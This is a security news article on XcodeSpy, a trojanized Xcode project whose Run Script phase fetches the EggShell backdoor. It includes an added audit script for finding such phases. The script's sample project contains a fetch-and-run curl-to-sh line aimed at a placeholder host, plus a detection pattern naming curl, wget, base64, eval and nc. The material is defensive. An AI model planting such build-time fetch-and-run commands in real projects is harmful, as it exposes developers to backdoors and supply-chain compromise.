Hackers infect Apple app developers with Trojanized Xcode projects

Cybersecurity researchers on Thursday disclosed a new attack in which threat actors use Xcode as an attack vector to compromise Apple platform developers with a backdoor, adding to a growing trend of attacks targeting developers and researchers.

Named “XcodeSpy”, the Trojanized Xcode project is a modified version of a legitimate, open-source project available on GitHub called TabBarInteraction, which developers use to animate iOS tab bars based on user interaction.

“XcodeSpy is a malicious Xcode project that installs a custom version of the EggShell backdoor on the developer’s MacOS computer along with a persistence mechanism,” said SentinelOne researchers.

Xcode is Apple’s integrated development environment (IDE) for macOS, used to develop software for macOS, iOS, iPadOS, watchOS and tvOS.

Earlier this year, Google's Threat Analysis Group disclosed a North Korean campaign targeting security researchers and developers, which involved sharing a Visual Studio project designed to load malicious DLLs on Windows systems.

The Trojanized Xcode project does something similar, only this time the attacks single out Apple developers.

In addition to the original code, XcodeSpy contains a Run Script that executes when the developer's build target is launched. The script contacts an attacker-controlled server to retrieve a custom version of the EggShell backdoor onto the development machine; the backdoor can record from the victim's microphone and camera and capture keystrokes.

“XcodeSpy takes advantage of a built-in feature of Apple's IDE that allows developers to run a custom shell script when launching an instance of their target application,” the researchers said. “While the technique is easy to identify if it is looked for, new or inexperienced developers who are not aware of the Run Script feature are particularly at risk, as there is no indication in the console or debugger that the malicious script has executed.”
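The Run Script feature the researchers describe is stored in the project file as a `PBXShellScriptBuildPhase` object inside `project.pbxproj`, so a developer can audit a downloaded project before ever opening it in Xcode. The following script is an added example (not from the SentinelOne report or this article): it lists every Run Script phase, counts them, and flags scripts that fetch or decode content at build time. The sample `project.pbxproj`, its object IDs and the `placeholder.invalid` host are constructed for illustration.

```shell
#!/bin/sh
# Audit an Xcode project for Run Script build phases before building it.
# Added example; assumes the OpenStep-plist text format Xcode writes to
# project.pbxproj, where each phase is a "{ ... };" block with an "isa" key.

# Print the shellScript value of every PBXShellScriptBuildPhase, one per line.
# Usage: list_run_scripts path/to/App.xcodeproj/project.pbxproj
list_run_scripts() {
    awk '
        /isa = PBXShellScriptBuildPhase;/ { inphase = 1 }
        inphase && /shellScript = / {
            sub(/^[[:space:]]*shellScript = "/, "")   # strip key and opening quote
            sub(/";[[:space:]]*$/, "")                # strip closing quote and ;
            print
        }
        inphase && /^[[:space:]]*};/ { inphase = 0 }  # end of this object block
    ' "$1"
}

# Number of Run Script phases; a CI gate can fail when this is non-zero for
# projects that are not expected to run any scripts at build time.
count_run_scripts() {
    grep -c 'isa = PBXShellScriptBuildPhase;' "$1" || true
}

# Run Script phases that download, decode or evaluate content deserve a
# manual review before the project is built on a developer machine.
flag_suspicious() {
    list_run_scripts "$1" | grep -E 'curl|wget|base64|eval|osascript|nc ' || true
}

# Constructed sample project file: one benign lint phase and one phase that
# pulls a script from a placeholder host, the pattern described above.
SAMPLE_PBXPROJ=$(mktemp)
cat > "$SAMPLE_PBXPROJ" <<'EOF'
// !$*UTF8*$!
{
	objects = {
		AAAA0001 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			files = (
			);
		};
		AAAA0002 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -fsSL https://placeholder.invalid/setup | sh\n";
		};
		AAAA0003 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
	};
}
EOF

echo "Run Script phases found: $(count_run_scripts "$SAMPLE_PBXPROJ")"
list_run_scripts "$SAMPLE_PBXPROJ"
echo "Needs review:"
flag_suspicious "$SAMPLE_PBXPROJ"
```

Point `list_run_scripts` at the `project.pbxproj` inside any `.xcodeproj` you did not author; the scripts are stored verbatim (with `\n` escapes), so anything that fetches, decodes or evaluates remote content is visible before the first build runs it.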

SentinelOne said it identified two variants of the EggShell payload, with samples uploaded to VirusTotal from Japan on August 5 and October 13 last year. Additional clues indicate that an unnamed U.S. organization was targeted in this campaign between July and October 2020, and that other developers in Asia were likely targeted as well.

Adversaries have previously used tainted Xcode executables (XcodeGhost) to inject malicious code into iOS applications compiled with the infected Xcode without the developers' knowledge, and then used those infected applications to collect information from devices once they were downloaded and installed from the App Store.

Then, in August 2020, Trend Micro researchers discovered a similar threat spread through modified Xcode projects which, at build time, were configured to install malware called XCSSET that stole credentials, captured screenshots, exfiltrated sensitive data from messaging and note-taking applications, and even encrypted files for ransom.

Like XCSSET, XcodeSpy takes a simpler approach, as the goal appears to be to hit the developers themselves, although the ultimate aim of the operation and the identity of the group behind it remain unclear.

“Targeting software developers is the first step in a successful supply chain attack. One way to do this is to abuse the development tools needed to do this,” the researchers said.

“It is entirely possible that XcodeSpy was targeted at a particular developer or group of developers, but there are other potential scenarios with such high-value victims. Attackers could simply search for interesting targets and gather data for future campaigns, or they could try to gather Apple ID credentials for use in other campaigns that use malware with valid Apple Developer code signatures.”
